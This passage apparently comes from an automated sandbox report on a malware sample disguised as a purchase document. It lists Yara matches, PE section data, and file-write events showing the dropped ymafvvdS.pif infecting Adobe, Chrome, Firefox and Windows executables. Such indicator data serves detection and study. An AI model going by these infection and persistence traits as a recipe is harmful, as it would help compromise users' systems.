                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdbX source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara match File source: 0.2.PURCHASE REQUIRED DETAILS 000487958790903403.exe.2b10000.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: ymafvvdS.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02B2894C
                  Source: alpha.pif.5.dr Static PE information: section name: .didat
                  Source: OfficeC2RClient.exe.9.dr Static PE information: section name: .didat
                  Source: OfficeC2RClient.exe.9.dr Static PE information: section name: .detourc
                  Source: officesvcmgr.exe.9.dr Static PE information: section name: .didat
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: .00cfg
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: .gxfg
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: .retplne
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: LZMADEC
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: _RDATA
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: malloc_h
                  Source: chrmstp.exe.9.dr Static PE information: section name: .00cfg
                  Source: chrmstp.exe.9.dr Static PE information: section name: .gxfg
                  Source: chrmstp.exe.9.dr Static PE information: section name: .retplne
                  Source: chrmstp.exe.9.dr Static PE information: section name: CPADinfo
                  Source: chrmstp.exe.9.dr Static PE information: section name: LZMADEC
                  Source: chrmstp.exe.9.dr Static PE information: section name: _RDATA
                  Source: chrmstp.exe.9.dr Static PE information: section name: malloc_h
                  Source: setup.exe.9.dr Static PE information: section name: .00cfg
                  Source: setup.exe.9.dr Static PE information: section name: .gxfg
                  Source: setup.exe.9.dr Static PE information: section name: .retplne
                  Source: setup.exe.9.dr Static PE information: section name: CPADinfo
                  Source: setup.exe.9.dr Static PE information: section name: LZMADEC
                  Source: setup.exe.9.dr Static PE information: section name: _RDATA
                  Source: setup.exe.9.dr Static PE information: section name: malloc_h
                  Source: notification_helper.exe.9.dr Static PE information: section name: .00cfg
                  Source: notification_helper.exe.9.dr Static PE information: section name: .gxfg
                  Source: notification_helper.exe.9.dr Static PE information: section name: .retplne
                  Source: notification_helper.exe.9.dr Static PE information: section name: CPADinfo
                  Source: notification_helper.exe.9.dr Static PE information: section name: _RDATA
                  Source: notification_helper.exe.9.dr Static PE information: section name: malloc_h
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: .00cfg
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: .gxfg
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: .retplne
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: _RDATA
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: malloc_h
                  Source: crashreporter.exe.9.dr Static PE information: section name: .00cfg
                  Source: crashreporter.exe.9.dr Static PE information: section name: .voltbl
                  Source: default-browser-agent.exe.9.dr Static PE information: section name: .00cfg
                  Source: default-browser-agent.exe.9.dr Static PE information: section name: .voltbl
                  Source: firefox.exe.9.dr Static PE information: section name: .00cfg
                  Source: firefox.exe.9.dr Static PE information: section name: .freestd
                  Source: firefox.exe.9.dr Static PE information: section name: .retplne
                  Source: firefox.exe.9.dr Static PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: .00cfg
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.dr Static PE information: section name: _RDATA
                  Source: armsvc.exe.9.dr Static PE information: section name: .didat
                  Source: alg.exe.9.dr Static PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: .gehcont
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.9.dr Static PE information: section name: .gehcont
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .retplne
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .retplne
                  Source: FXSSVC.exe.9.dr Static PE information: section name: .didat
                  Source: elevation_service.exe.9.dr Static PE information: section name: .00cfg
                  Source: elevation_service.exe.9.dr Static PE information: section name: .gxfg
                  Source: elevation_service.exe.9.dr Static PE information: section name: .retplne
                  Source: elevation_service.exe.9.dr Static PE information: section name: _RDATA
                  Source: elevation_service.exe.9.dr Static PE information: section name: malloc_h
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .00cfg
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .gxfg
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .retplne
                  Source: elevation_service.exe0.9.dr Static PE information: section name: _RDATA
                  Source: elevation_service.exe0.9.dr Static PE information: section name: malloc_h
                  Source: maintenanceservice.exe0.9.dr Static PE information: section name: .00cfg
                  Source: maintenanceservice.exe0.9.dr Static PE information: section name: .voltbl
                  Source: maintenanceservice.exe0.9.dr Static PE information: section name: _RDATA
                  Source: msdtc.exe.9.dr Static PE information: section name: .didat
                  Source: msiexec.exe.9.dr Static PE information: section name: .didat
                  Source: MsSense.exe.9.dr Static PE information: section name: .didat
                  Source: unpack200.exe.9.dr Static PE information: section name: .00cfg
                  Source: Spectrum.exe.9.dr Static PE information: section name: .didat
                  Source: TieringEngineService.exe.9.dr Static PE information: section name: .didat
                  Source: vds.exe.9.dr Static PE information: section name: .didat
                  Source: VSSVC.exe.9.dr Static PE information: section name: .didat
                  Source: WmiApSrv.exe.9.dr Static PE information: section name: .didat
                  Source: wmpnetwk.exe.9.dr Static PE information: section name: .didat
                  Source: ie_to_edge_stub.exe.9.dr Static PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.9.dr Static PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.9.dr Static PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.9.dr Static PE information: section name: _RDATA
                  Source: cookie_exporter.exe.9.dr Static PE information: section name: .00cfg
                  Source: cookie_exporter.exe.9.dr Static PE information: section name: .gxfg
                  Source: cookie_exporter.exe.9.dr Static PE information: section name: .retplne
                  Source: cookie_exporter.exe.9.dr Static PE information: section name: _RDATA
                  Source: identity_helper.exe.9.dr Static PE information: section name: .00cfg
                  Source: identity_helper.exe.9.dr Static PE information: section name: .gxfg
                  Source: identity_helper.exe.9.dr Static PE information: section name: .retplne
                  Source: identity_helper.exe.9.dr Static PE information: section name: _RDATA
                  Source: identity_helper.exe.9.dr Static PE information: section name: malloc_h
                  Source: setup.exe0.9.dr Static PE information: section name: .00cfg
                  Source: setup.exe0.9.dr Static PE information: section name: .gxfg
                  Source: setup.exe0.9.dr Static PE information: section name: .retplne
                  Source: setup.exe0.9.dr Static PE information: section name: LZMADEC
                  Source: setup.exe0.9.dr Static PE information: section name: _RDATA
                  Source: setup.exe0.9.dr Static PE information: section name: malloc_h
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: .00cfg
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: .gxfg
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: .retplne
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: _RDATA
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: malloc_h
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3D2FC push 02B3D367h; ret 0_2_02B3D35F
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B163B0 push 02B1640Bh; ret 0_2_02B16403
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B163AE push 02B1640Bh; ret 0_2_02B16403
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1332C push eax; ret 0_2_02B13368
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3C378 push 02B3C56Eh; ret 0_2_02B3C566
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1C349 push 8B02B1C1h; ret 0_2_02B1C34E
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3D0AC push 02B3D125h; ret 0_2_02B3D11D
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2306B push 02B230B9h; ret 0_2_02B230B1
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2306C push 02B230B9h; ret 0_2_02B230B1
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3D1F8 push 02B3D288h; ret 0_2_02B3D280
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2F108 push ecx; mov dword ptr [esp], edx 0_2_02B2F10D
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3D144 push 02B3D1ECh; ret 0_2_02B3D1E4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B16782 push 02B167C6h; ret 0_2_02B167BE
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B16784 push 02B167C6h; ret 0_2_02B167BE
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1D5A0 push 02B1D5CCh; ret 0_2_02B1D5C4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B3C570 push 02B3C56Eh; ret 0_2_02B3C566
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1C56C push ecx; mov dword ptr [esp], edx 0_2_02B1C571
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2AAE0 push 02B2AB18h; ret 0_2_02B2AB10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B28AD8 push 02B28B10h; ret 0_2_02B28B08
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2AADF push 02B2AB18h; ret 0_2_02B2AB10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1CA4E push 02B1CD72h; ret 0_2_02B1CD6A
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B1CBEC push 02B1CD72h; ret 0_2_02B1CD6A
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2886C push 02B288AEh; ret 0_2_02B288A6
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B84850 push eax; ret 0_2_02B84920
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B2790C push 02B27989h; ret 0_2_02B27981
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B26946 push 02B269F3h; ret 0_2_02B269EB
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B26948 push 02B269F3h; ret 0_2_02B269EB
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B25E7C push ecx; mov dword ptr [esp], edx 0_2_02B25E7E
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Code function: 0_2_02B22F60 push 02B22FD6h; ret 0_2_02B22FCE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif Code function: 9_1_00423149 push eax; ret 9_1_00423179
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif Code function: 9_1_004231C8 push eax; ret 9_1_00423179
                  Source: OfficeC2RClient.exe.9.dr Static PE information: section name: .reloc entropy: 7.716531641683351
                  Source: AutoIt3_x64.exe.9.dr Static PE information: section name: .reloc entropy: 7.943923715486162
                  Source: SciTE.exe.9.dr Static PE information: section name: .reloc entropy: 7.912306761260712
                  Source: jucheck.exe.9.dr Static PE information: section name: .reloc entropy: 7.931066535936268
                  Source: jusched.exe.9.dr Static PE information: section name: .reloc entropy: 7.9360449857967845
                  Source: officesvcmgr.exe.9.dr Static PE information: section name: .reloc entropy: 7.937214975696088
                  Source: chrome_pwa_launcher.exe.9.dr Static PE information: section name: .reloc entropy: 7.940578250020388
                  Source: chrmstp.exe.9.dr Static PE information: section name: .reloc entropy: 7.941007655078489
                  Source: setup.exe.9.dr Static PE information: section name: .reloc entropy: 7.941016483532946
                  Source: notification_helper.exe.9.dr Static PE information: section name: .reloc entropy: 7.941922342165591
                  Source: chrome_proxy.exe.9.dr Static PE information: section name: .reloc entropy: 7.939822159897867
                  Source: default-browser-agent.exe.9.dr Static PE information: section name: .reloc entropy: 7.941521323195514
                  Source: firefox.exe.9.dr Static PE information: section name: .reloc entropy: 7.938877607948963
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .reloc entropy: 7.934758045410535
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .reloc entropy: 7.9347595380157845
                  Source: AppVClient.exe.9.dr Static PE information: section name: .reloc entropy: 7.936511892174674
                  Source: FXSSVC.exe.9.dr Static PE information: section name: .reloc entropy: 7.9422618484251535
                  Source: elevation_service.exe.9.dr Static PE information: section name: .reloc entropy: 7.9439487512723215
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .reloc entropy: 7.9459521432086095
                  Source: SensorDataService.exe.9.dr Static PE information: section name: .reloc entropy: 7.9353733378156495
                  Source: Spectrum.exe.9.dr Static PE information: section name: .reloc entropy: 7.945441823870061
                  Source: AgentService.exe.9.dr Static PE information: section name: .reloc entropy: 7.9371088687797275
                  Source: vds.exe.9.dr Static PE information: section name: .reloc entropy: 7.941063416564255
                  Source: VSSVC.exe.9.dr Static PE information: section name: .reloc entropy: 7.939522654308565
                  Source: wbengine.exe.9.dr Static PE information: section name: .reloc entropy: 7.941271109507692
                  Source: wmpnetwk.exe.9.dr Static PE information: section name: .reloc entropy: 7.946597973181
                  Source: identity_helper.exe.9.dr Static PE information: section name: .reloc entropy: 7.929614491235706
                  Source: setup.exe0.9.dr Static PE information: section name: .reloc entropy: 7.933869100083904
                  Source: msedgewebview2.exe.9.dr Static PE information: section name: .reloc entropy: 7.925314997991553

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3f155f6931e417df.bin
                  Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe File created: C:\Users\Public\Libraries\ymafvvdS.pif
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
